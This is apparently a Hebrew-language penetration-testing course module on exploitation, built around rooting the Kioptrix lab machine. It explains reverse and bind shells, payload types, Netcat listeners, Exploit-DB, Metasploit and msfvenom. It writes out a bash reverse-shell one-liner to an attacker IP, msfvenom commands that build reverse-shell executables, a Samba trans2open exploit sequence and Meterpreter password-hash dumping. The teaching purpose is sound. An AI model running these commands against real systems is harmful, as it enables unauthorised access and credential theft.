

מודול 7

חומר לימוד

1 יחידות

תוכן העניינים

1. מודול 7 — ניצול והשגת גישה (Exploitation)

מודול 7 — ניצול והשגת גישה (Exploitation)

מטרות המודול: להפוך חולשה שזוהתה לגישה בפועל למערכת. נבין **Shells** (Reverse מול Bind), **Payloads** (Staged מול Non-Staged), Listeners עם Netcat, ניצול ידני מ-Exploit-DB, ואת **Metasploit Framework** — ובסוף ננצל את Kioptrix ונשיג **root**.

קבצים: README.md · missions.md · solutions.md · practice.md · slides.md

מבוסס על שיעורי המקור #48–#51 (Reverse/Bind Shells, Staged/Non-Staged Payloads, Gaining Root with Metasploit).

המקום בשרשרת: שלב 3 מחמשת השלבים — Gaining Access. במודול 6 מצאנו חולשה Samba/mod_ssl של Kioptrix; כאן ננצל אותה בפועל.

תוכן העניינים

1. שלב הניצול — סקירה
2. מהו Shell
3. Reverse מול Bind Shell
4. Staged Payloads מול Non-Staged
5. Listener — Netcat ידני
6. ניצול ידני מ-Exploit-DB
7. Metasploit Framework
8. ניצול root → Kioptrix
9. msfvenom ו-Meterpreter

7.1 שלב הניצול — סקירה

ניצול (Exploitation) הוא הפעלת ה-Exploit על החולשה, כדי להריץ קוד על היעד ולהשיג **Shell** — שליטה בשורת הפקודה של המכונה המרוחקת.

⚠️ זהירות: Exploits עלולים להקריס שירותים או מערכות. בבדיקה אמיתית — הרץ בזהירות ובאישור. במעבדה — קח Snapshot לפני.

7.2 מהו Shell?

Shell הוא ערוץ שמאפשר לך להריץ פקודות על המכונה המרוחקת — כאילו אתה יושב מולה. השגת Shell = השגת שליטה.

- שאלה מרכזית: מי יוזם את החיבור — התוקף או הקורבן? התשובה קובעת אם זה Reverse או Bind.

7.3 Reverse מול Bind Shell

Bind Shell	Reverse Shell	
התוקף מתחבר לקורבן	הקורבן מתחבר לתוקף	מי יוזם חיבור
הקורבן	התוקף	Listener אצל
פורט פתוח נגיש אצל הקורבן	הקורבן מאחורי חומת אש/NAT (הנפוץ)	מתי משתמשים
חומות אש חוסמות פורטים נכנסים	—	חיסרון

Reverse Shell — הנפוץ ביותר

```
הקורבן מתחבר ---- קורבן <---- (על פורט 4444 Listener) תוקף
```

התוקף פותח “מאזין” (Listener), וה-Payload בקורבן “מתקשר הביתה” אל התוקף. עוקף חומות אש כי תעבורה יוצאת לרוב מותרת.

Bind Shell

```
(על פורט פתוח Listener) תוקף ---- מתחבר <---- קורבן
```

ה-Payload פותח פורט מאזין בקורבן, והתוקף מתחבר אליו. פחות נפוץ — חומות אש חוסמות פורטים נכנסים.

כלל אצבע: ברוב המקרים משתמשים ב-Reverse Shell, כי הקורבן לרוב מאחורי NAT/Firewall שחוסם חיבורים נכנסים אך מתיר יוצאים.

Non-Staged מול Payloads: Staged 7.4

Payload הוא הקוד שרץ על היעד לאחר הניצול (למשל "פתח לי Shell").

Non-Staged	Staged	
נשלח בבת אחת, מלא	נשלח בשלבים (Stager קטן → Stage מלא)	מבנה
גדול יותר	קטן יותר בהתחלה	גודל
יציב יותר	תלוי בחיבור רציף	יציבות
windows/meterpreter_reverse_tcp	windows/meterpreter/reverse_tcp	דוגמה ב-msf

• ה- / בשם ה-Payload מסמן **Staged** (למשל `.../reverse_tcp`).

• ה- _ מסמן **Non-Staged** (למשל `..._reverse_tcp`).

💡 אם Shell נכשל בצורה מוזרה — נסה להחליף בין Staged ל-Non-Staged. לעיתים אחד עובד והשני לא, תלוי בסביבה.

Netcat 7.5 — הכלי הבסיסי

Netcat (nc) הוא "סכין הצבא השווייצרי" של הרשת — פותח חיבורי TCP/UDP גולמיים. משמש כ-Listener ל-Reverse Shell:

```
# על פורט 4444 Listener אצל התוקף – פתיחת
nc -lvnp 4444
# -l listen, -v verbose, -n ללא DNS, -p port
```

כשה-Reverse Shell של הקורבן יתחבר — תקבל שורת פקודה שלו.

```
# (Bash) שהקורבן מריץ Reverse Shell דוגמת:
bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
```

🔍 אתר מצוין לגזור Reverse Shells בכל שפה: revshells.com

7.6 ניצול ידני מ-Exploit-DB

זוכרים את ה-Exploit שמצאנו ב- searchsploit (מודול 6)? כך מפעילים אותו ידנית:

```
searchsploit -m 764          # לתיקיה הנוכחית Exploit-העתקת ה
cat 764.c                    # קריאת הקוד וההוראות (בראש הקובץ!)
gcc 764.c -o exploit         # (C-ב Exploit-ל) קומפילציה
./exploit <target> <args>    # הפעלה
```

⚠ תמיד קרא את קוד ה-Exploit לפני הרצה — ודא מה הוא עושה, ושאינו זדוני. Exploits מהאינטרנט עלולים להכיל “הפתעות”. לעיתים צריך להתאים את הקוד (Offsets, כתובות IP, פורטים) לפני קומפילציה.

Metasploit Framework 7.7

Metasploit הוא מסגרת הניצול המקיפה ביותר — אלפי Exploits ו-Payloads מוכנים, בממשק אחיד.

מושגי יסוד

מושג	פירוש
Exploit	הקוד שמנצל את החולשה
Payload	מה שרץ אחרי (Shell/Meterpreter)
Module	יחידה (exploit/auxiliary/post)
LHOST/LPORT	ה-IP והפורט של התוקף (למאזין)
RHOSTS	ה-IP של היעד

זרימת עבודה בסיסית (msfconsole)

```
msfconsole          # הפעלה
search samba        # חיפוש Exploit
use exploit/multi/samba/usermap_script # בחירת Module
show options        # אילו פרמטרים דרושים
set RHOSTS 192.168.1.10 # הגדרת היעד
set LHOST 192.168.1.5   # הגדרת התוקף (שלך)
show payloads       # Payloads תואמים
set PAYLOAD cmd/unix/reverse # בחירת Payload
exploit             # run (או) !הפעלה
```

7.8 ניצול מעשי: Kioptrix → root

נחבר את הכל. במודול 6 גילינו ש-Kioptrix מריץ **Samba פגיע**. ננצל אותו ב-Metasploit ונשיג :root

```
msfconsole
search trans2open          # Kioptrix של Samba ל-Exploit ה-
use exploit/linux/samba/trans2open
show options
set RHOSTS 192.168.1.10    # Kioptrix של IP ה-
set LHOST 192.168.1.5      # Kali של IP ה-
set PAYLOAD linux/x86/shell_reverse_tcp
exploit
```

אם הצליח — תקבל Shell. בדוק מי אתה:

```
whoami      # root ← השגנו שליטה מלאה!
id
hostname
```

🎯 **הרגע הזה** — מעבר מ-“מצאתי חולשה” ל-“אני root על המכונה” — הוא לב בדיקת החדירות. תעד אותו (צילום מסך של whoami = הוכחת ניצול לדוח).

וקטור חלופי (mod_ssl): ה-(CVE-2002-0082) “OpenFuck” Exploit על פורט 443 — ניצול ידני מ-Exploit DB (סעיף 7.6) המוביל גם הוא ל-root.

Meterpreter-1 msfvenom 7.9

msfvenom — יצירת Payloads מותאמים

כשצריך Payload עצמאי (קובץ להעלות/להריץ ביעד):

```
# Reverse Shell ל-Windows כקובץ exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o shell.exe
# Reverse Shell ל-Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf -o shell
```

- `-p` Payload · `-f` פורמט · `-o` קובץ פלט.
- לאחר שהקורבן מריץ, קולטים עם `multi/handler` ב-Metasploit.

Meterpreter — Payload מתקדם

Meterpreter הוא Shell משודרג של Metasploit, עם פקודות עוצמתיות:

<code>sysinfo</code>	# פרטי המערכת
<code>getuid</code>	# מי אני
<code>hashdump</code>	# של סיסמאות Hashes שאיבת
<code>download / upload</code>	# העברת קבצים
<code>shell</code>	# רגיל Shell-מעבר ל

Meterpreter רץ בזיכרון (שקט יותר) ומהווה בסיס מצוין ל**פוסט-אקספלויטציה** (מודול 11). 💡

סיכום המודול

- **Shell** = שליטה בשורת הפקודה המרוחקת. **Reverse** (הקורבן מתחבר אליך — הנפוץ) מול **Bind** (אתה מתחבר לקורבן).
- **Payloads: Staged** (/ , בשלבים) מול **Non-Staged** (_ , מלא).
- **Listener** = `( nc -l vnp ) Netcat` בסיסי; **revshells.com** לגזירת Reverse Shells.
- **ניצול ידני** מ-Exploit-DB (קרא, התאם, קמפל, הרץ) — תמיד קרא את הקוד קודם.
- **Metasploit**: `search → use → set RHOSTS/LHOST/PAYLOAD → exploit`. ניצלנו את Samba של Kioptrix והשגנו **root**.
- **msfvenom** ליצירת **Meterpreter** Payloads ל-post-exploitation.

מה הלאה?

→ `practice.md` — תרגול ותרחישים · `solutions.md` — פתרונות · `missions.md` — תרגילים →

מודול 8 — מתקפות סיסמאות

← חזרה למפת הקורס